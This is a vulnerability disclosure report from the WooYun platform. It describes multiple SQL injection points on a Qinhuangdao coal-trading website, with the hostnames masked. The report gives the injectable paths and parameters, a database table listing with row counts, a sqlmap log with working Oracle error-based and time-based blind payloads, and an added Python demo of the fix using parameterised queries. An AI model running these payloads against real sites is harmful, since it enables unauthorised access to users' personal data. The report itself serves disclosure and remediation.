Vulnerability summary

Defect ID: wooyun-2015-0142382

Title: Multiple SQL injection vulnerabilities on the main site of a coal-trading website (100,000 user records exposed)

Vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-23 23:08

Fixed: 2015-11-08 16:22

Published: 2015-11-08 16:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-23: Details sent to the vendor; awaiting vendor handling
2015-09-24: CNCERT has not yet been able to contact the affected organization; details disclosed only to the reporting agency
2015-10-04: Details disclosed to core white hats and relevant domain experts
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to intern white hats
2015-11-08: Details disclosed to the public

Brief description:

Multiple SQL injection points across the Qinhuangdao Coal Network (秦皇岛煤炭网) site; over 100,000 user records exposed

Details:

Injection points:
**.**.**.**/include/DownloadFile.jsp?id=113
http://**.**.**.**/coalport/coalport_2j.jsp?id=O15
http://**.**.**.**/Trade/Price/2015/price_qhd_page.jsp?place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD
http://**.**.**.**/Trade/Price/title/more_price.jsp?type=31
sqlmap screenshot: [image 1.jpg]

DBA privileges: [image 2.jpg]

Database information:
The MEMBER table, with 123414 rows, shows the volume of user data.

Database: COALTRADE
+--------------------------------+---------
| Table | Entries
+--------------------------------+---------
| USERLOGIN | 13212264
| LOGIN_ACTION_LOG | 6092875
| MESSAGE_SEND_LOG | 2650808
| COAL_FIELD_STORE | 1100796
| AREA_COOPERATION | 523481
| MYTABLE | 374343
| IPADDRESS | 374340
| COAL_STORE_DAY | 291673
| T_STORE_CURR | 178527
| COAL_OCEAN_PRICE_NEW | 153783
| MEMBER | 123414
| FINANCE_REQUIRE_DAY | 119043
| QTGK_DGYB | 117082
| OTHER_INFO | 106844
| CORF_STORE_NOW | 105724
| JTG_CORP_YARD_STORE_INFO | 105003
| CFD_COALSTORENOW | 101336
| PHONE_USER_VISIT | 96875
| COAL_TRANSPORT_PRICE | 96228
| M_SHIPSTEP | 84793
| FINANCE_PORT_DAY | 74828
| CFDZCTZ | 64328
| INFO | 56825
| SYS_LOGIN_RECORD | 54591
| M_TRAINUNLOAD | 54518
| COAL_OCEAN_PRICE | 51660
| M_STORAGE | 49282
| COAL_PRICE | 48121
| CFD_PLAN_TO_BERTH_INFO | 47133
| QTGK_LGCB | 32066
| JTG_PLAN_TO_BERTH_INFO | 31144
| FINANCE_RAILWAY_DAY | 30440
| COALINFO | 22754
| QTGK_ZGCB | 21266
| SCZC | 21182
| MESSAGE_MEMBER_ORDER_LIST | 16069
| PRICE_GUANGZHOU_PORT | 15861
| M_TRAIN | 15080
| BUSSINESS_MERGE | 14913
| IPADDRESS_MAIN | 12975
| QTGK_HHG_CCRB | 11320
| INFO_LINE | 11162
| M_TRAINDAIL | 10468
| GET_IP_ADDRESS | 10378
| CFD_PORT_SHIP_WORK_INFO | 10094
| MESSAGE_LOG | 9990
| JTG_UNLOAD_MONTH_NUM | 9878
| SUPPLY_STORE | 9651
| CFD_LEV_SHIP_INFO_ONE | 8828
| QUESTION | 8196
| JTG_INPORT_LOAD_INFO | 7841
| SHIP_APPLY_INFO | 7717
| M_ASSAY | 7536
| FINANCE_PORT_MONTH | 7151
| PRICE_OCFI | 6998
| FOREIGN_COAL_PRICE | 6717
| CFD_PLAN_TRAIN_CHECK | 6591
| FINANCE_ELECTRIC_H1 | 6276
| FINANCE_COUNTRYCOAL_CN | 5929
| T_B_SHIP | 5713
| CFDMTDJB | 5660
| M_TRAINSAMPLE | 5422
| JTG_PLAN_TRAIN_CHECK | 5214
| FINANCE_PRODUCE_DAY | 4416
| JTG_PORT_SHIP_WORK_INFO | 4365
| TBL_LOGIN | 4312
| FINANCE_REQUIRE_MONTH | 4224
| GS6_NOWSTORAGE | 4086
| JTG_LEV_SHIP_INFO | 3623
| JTG_LEV_SHIP_INFO_ONE | 3608
| FINANCE_RAILWAY_MONTH | 3345
| FINANCE_PRODUCE_MONTH | 3279
| MESSAGE_MEMBER_ORDER | 3195
| MESSAGE_MEMBER_ORDER_PAY | 3116
| CFD_STORECOLLEC | 3080
| FINANCE_PRODUCE_YEAR | 2933
| FINANCE_PRODUCE_CN | 2852
| USERONLINE | 2841
| JTG_PLAN_CLASS_ARRIVE | 2668
| COAL_BDI | 2645
| M_SHIPSAMPLE | 2380
| M_SHIPSAMPLEDAIL | 2363
| COALPRICE_EVERYDAY | 2320
| M_SHIPDOC | 2268
| LARGE_ENT_PORT_PRICE | 2257
| CFD_STORECOLLECT_PAY | 2212
| INFO_PHONE | 2073
| MEMBER_FEE | 1943
| COAL_INDEX | 1881
| QTGK_CCDT | 1539
| COAL_INFO | 1400
| FINANCE_ELECTRIC_CN | 1280
| INTERNATIONAL_COAL_OCEAN_PRICE | 1265
| QTGK_MTJC | 1132
| QTGK_DJDC | 1099
| V_LITTERGOODS | 1060
| SHIP_IMPORTANT_INFO | 971
| T_SEARCH_ENGINE | 967
| JTG_MEMBER | 878
| M_XCJHB | 790
| MEMBER_RIGHT | 625
| QTGK_HHG_SCSB | 599
| CFDHZDAB | 549
| REALTRADE | 546
| FINANCE_SYSTEM_TABLE_TITLE | 545
| Z2 | 533
| INFO_KIND | 527
| MENU_SET | 498
| COAL_CHECK_RESULT | 497
| SMJ_COAL_CHECK_RESULT | 476
| COAL_CHECK_CON | 466
| COAL_STAND | 465
| MESSAGE_PHONE | 455
| QTGK_TLJG | 425
| ZSH_XCHY | 412
| DOWNLOAD_FILE | 397
| T_B_SHIPCOMPANY | 392
| CFDMTDCB | 381
| JTG_CAROUT | 370
| YK_COAL_ACCOUNT | 347
| GZG | 321
| JOB_INFO | 312
| CFDFFB | 288
| YW_ARCHIVES | 267
| QTGK_MTZC | 244
| T_B_COUNTRY | 240
| QTGK_MTXC | 229
| EMAILSERVER | 225
| JTG_CARIN | 204
| QTGK_GLJG | 193
| ZSH_ZCHY | 182
| COAL_BLENDING_DETAIL | 180
| PLACE | 173
| LARGE_ENT_PORT_PRICE_TITLE | 167
| CFDMZB | 145
| MESSAGE_GNHY | 137
| PAGE | 133
| QTGK_MZYB | 129
| LARGE_ENT_PORT_PRICE1 | 128
| FINANCE_SYSTEM_TABLE | 123
| TODAYWEA | 121
| JTG_DMJG | 102
| COAL_BLENDING_CHARGE | 100
| MENU | 99
| MEMBER_COMP | 98
| CFDGZB | 94
| FINANCE_LASTTIME | 93
| FINANCE_ELECTRIC_MONTH | 88
| JTG_COALINFO | 87
| COAL_BLENDING_TMP_REPORT | 80
| MESSAGE_NOTE | 80
| JTG_SHIP_DAY_REPORT | 79
| FREIGHTINFO | 78
| CFDQYMCGB | 70
| UPLOAD_FILE | 66
| LASTDATE | 65
| LOGIN_USERNAME | 63
| FINANCE_PRODUCE_YEAR_H1 | 60
| MEMBER_SHIP | 59
| CFDUSER_RIGHT | 49
| COAL_PRICE_TREND | 48
| QTGK_JCHJ | 48
| ZSH_TRAIN_ARRIVE | 43
| JTG_JMJG | 42
| CFDFZB | 37
| CUSTOM | 35
| MESSAGE_PACKAGE | 35
| JTG_SHIPINFO | 34
| MEMBER_QH | 34
| MEMBER_TYPE | 31
| SHIPAGENT | 31
| MENU_COMPANY | 29
| TBL_GZRY | 29
| COAL_BLENDING_CONTRACT | 28
| SYS_USER | 26
| M_MZ | 25
| MEM_CORP | 25
| SYS_MANAGER | 25
| FINANCE_TRANSFERRED_CN | 24
| MESSAGE_PACKAGE_GROUP_LIST | 24
| QTGK_ZXYB | 24
| VIEW_PUB_PRICE_INTV | 24
| CORP_BERTH | 22
| HOTPOINT | 21
| PBCATEDT | 21
| PBCATFMT | 20
| CFD_PLAN_CLASS_ARRIVE | 19
| MEMBER_CORP | 19
| COAL_CHECK | 18
| DOWNLOAD_FILE_TYPE | 18
| PERIODICAL_ORDER_DETAIL | 17
| YK_UPLOAD | 17
| CFDDCF | 16
| CFDPAGE | 16
| HISTORICAL_DATA_DOWNLOAD | 16
| IMAGE_POSITION | 16
| INFO_SUGGESTION | 16
| JTG_KSJG | 16
| MESSAGE_MEMBER_GROUP | 16
| PERIODICAL_ORDER | 16
| PROJECT | 15
| USER_REGISTER | 15
| MSGBOARD | 14
| POLL | 13
| CHANNEL_INFO | 12
| QTGK_GLDC | 12
| SYS_SEQUENCE_LIST | 12
| C_CHANNEL | 11
| AREA_COOPERATION_TYPE | 10
| HUANENG_CX | 10
| SMJUSERS | 10
| TOPINFO | 10
| ZSH_MESSAGE | 10
| ZSH_SHIP | 10
| T_B_SHIPCONTRY | 9
| YHM | 9
| LARGE_ENT_PORT_PRICE_TITLE1 | 8
| PROJECT_ATTACHMENT | 8
| REALTRADE1 | 8
| SCHEDULE | 8
| USERS | 8
| ZMGPJY_CATALOGUE | 8
| CFDJGMTFF | 7
| CFDUSER | 7
| PROJECT_PLAN | 7
| T_B_SHIPTYPE | 7
| ZMGPJY_PRICE | 7
| FINANCE_PORT_NAME | 6
| YW_POWERPAGE | 6
| YW_ROLE_RIGHTS_ASSIGNMENT | 6
| ZSH_COALTYPE | 6
| CFDDCFFB | 5
| CFDUSER_TYPE | 5
| SHIP_TRADE_INFO | 5
| TBL_RYLB | 5
| TBL_ZLDW | 5
| CFDDCFLB | 4
| COAL_BLENDING_CHARGE_RATE | 4
| HYK_BUSINESS | 4
| HYK_TAX_MONTH | 4
| JTG_CORP | 4
| MESSAGE_MEMBER_GROUP_LIST | 4
| MESSAGE_PACKAGE_GROUP | 4
| HYK_TAX_YEAR | 3
| INFO_CONTENT_URL | 3
| PHONE_CHANNEL_TYPE | 3
| QTGK_MEMBER | 3
| RESEARCH | 3
| RESEARCHDEVOTE | 3
| TEXT | 3
| CFDGZFLB | 2
| FINANCE_SYSTEM_DP | 2
| SMJ_COMP | 2
| SYS_PARAM | 2
| TBL_SFLB | 2
| YK_PORT_SHIP_WORK_INFO | 2
| BOAT | 1
| MESSAGE_EMAIL | 1
| NOCHECKIP_MEMBER | 1
| OUT_PHONE | 1
| TBL_CKDH | 1
| TEL_USER | 1
| YW_OPERATOR | 1
| YW_ROLE_ASSIGNMENT | 1
| YW_ROLES | 1
| ZMGPJY_DETAIL | 1
| ZMGPJY_REMARK | 1
+--------------------------------+---------

Proof of vulnerability:

Full sqlmap run:

[14:45:16] [INFO] testing connection to the target URL
[14:45:17] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[14:45:17] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:45:18] [INFO] target URL is stable
[14:45:18] [INFO] testing if GET parameter 'place' is dynamic
[14:45:18] [WARNING] GET parameter 'place' does not appear dynamic
[14:45:18] [INFO] heuristic (basic) test shows that GET parameter 'place' might be injectable (possible DBMS: 'Oracle')
[14:45:18] [INFO] testing for SQL injection on GET parameter 'place'
heuristic (parsing) test showed that the back-end DBMS could be 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n]
[14:45:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:45:25] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[14:45:25] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses'
[14:45:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:45:26] [INFO] GET parameter 'place' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[14:45:26] [INFO] testing 'Oracle inline queries'
[14:45:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[14:45:27] [INFO] testing 'Oracle stacked queries (heavy query)'
[14:45:27] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[14:45:27] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[14:45:27] [INFO] testing 'Oracle AND time-based blind'
[14:45:37] [INFO] GET parameter 'place' seems to be 'Oracle AND time-based blind' injectable
[14:45:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:45:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:45:40] [INFO] target URL appears to be UNION injectable with 1 columns
[14:45:41] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
GET parameter 'place' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Parameter: place (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD' AND 6414=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6414=6414) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'ghBF'='ghBF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD' AND 6223=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(97)||CHR(114)||CHR(112),5) AND 'yDnX'='yDnX
---
[14:45:42] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, JSP
back-end DBMS: Oracle

Fix plan:
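The report leaves this section empty. As an added illustration, not the author's or the site's code: the lookups listed under the injection points splice a GET parameter into SQL text, which is what lets sqlmap append a boolean tail such as `' AND 'ghBF'='ghBF` and read the outcome. The affected site runs JSP on Oracle; the stand-in below uses Python's sqlite3 with a constructed price table (the table, its rows and the function names are assumptions) to show the true/false difference a vulnerable lookup exposes and how binding the parameter removes it.

```python
"""Why the id/place lookups are injectable, and how binding the value closes the hole.

Added illustration, not code from the report or from the affected site. The site runs JSP
on Oracle; this stand-in uses Python's sqlite3 with a constructed PRICE table and a query
of the same shape as a price_qhd_page.jsp?place=... lookup. The true/false tails reuse the
boolean tail sqlmap appended in the report ("' AND 'ghBF'='ghBF").
"""
import sqlite3


def make_db():
    """Constructed sample data standing in for the COALTRADE price tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE price (place TEXT, coal TEXT, price INTEGER)")
    conn.executemany(
        "INSERT INTO price VALUES (?, ?, ?)",
        [("秦皇岛", "5500K", 410), ("秦皇岛", "5000K", 360), ("广州港", "5500K", 470)],
    )
    return conn


def price_lookup_vulnerable(conn, place):
    """The injectable pattern: the request parameter is spliced into the SQL text."""
    sql = "SELECT coal, price FROM price WHERE place = '" + place + "'"
    return conn.execute(sql).fetchall()


def price_lookup_safe(conn, place):
    """Bound parameter: the value is data and is never parsed as SQL (PreparedStatement in JDBC)."""
    return conn.execute(
        "SELECT coal, price FROM price WHERE place = ?", (place,)
    ).fetchall()


def boolean_blind_demo(lookup):
    """Run a true tail and a false tail through `lookup` and return the two row counts.

    A boolean-blind probe only works if the two counts differ. The safe lookup returns
    (0, 0) because no place is literally named "秦皇岛' AND 'ghBF'='ghBF".
    """
    conn = make_db()
    true_tail = "秦皇岛' AND 'ghBF'='ghBF"
    false_tail = "秦皇岛' AND 'ghBF'='xxxx"
    return len(lookup(conn, true_tail)), len(lookup(conn, false_tail))


if __name__ == "__main__":
    print("vulnerable:", boolean_blind_demo(price_lookup_vulnerable))  # (2, 0)
    print("safe:      ", boolean_blind_demo(price_lookup_safe))        # (0, 0)
```

The vulnerable lookup answers the two tails differently, which is all a blind technique needs; the bound version treats the whole string as a place name and answers (0, 0) for both while still returning the two Qinhuangdao rows for a real place name. In the JSP code the equivalent fix is a `java.sql.PreparedStatement` with `?` placeholders and `setString`/`setInt`, applied to every page that takes `id`, `place` or `type` from the request; for the numeric `id` parameters, converting to an integer before the query is a cheap additional check.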

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-24 16:21

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been forwarded through CNCERT to the Hebei branch center, which will subsequently coordinate remediation with the website's administering unit.

Latest status:

None yet